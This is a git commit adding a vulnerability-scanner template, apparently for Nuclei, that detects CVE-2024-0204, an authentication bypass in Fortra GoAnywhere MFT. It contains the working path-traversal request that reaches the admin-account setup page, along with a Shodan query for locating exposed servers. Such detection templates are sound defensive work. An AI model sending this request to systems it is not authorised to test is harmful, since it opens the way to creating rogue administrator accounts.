Create CVE-2024-0204.yaml

patch-1
Dhiyaneshwaran 2024-01-24 02:35:52 +05:30 committed by GitHub
parent 23489cc05e
commit 766cf0c7bb
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 41 additions and 0 deletions

View File

@ -0,0 +1,41 @@
id: CVE-2024-0204
info:
name: Fortra GoAnywhere MFT - Authentication Bypass
author: DhiyaneshDK
severity: critical
description: |
Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.
reference:
- https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml
- https://www.fortra.com/security/advisory/fi-2024-001
- https://github.com/horizon3ai/CVE-2024-0204/blob/main/CVE-2024-0204.py
- https://www.horizon3.ai/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-deep-dive/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-0204
cwe-id: CWE-425
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:1484947000
tags: cve,cve2024,auth-bypass,goanywhere
http:
- method: GET
path:
- "{{BaseURL}}/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Create an administrator account"
- "goanywhere"
condition: and
- type: status
status:
- 200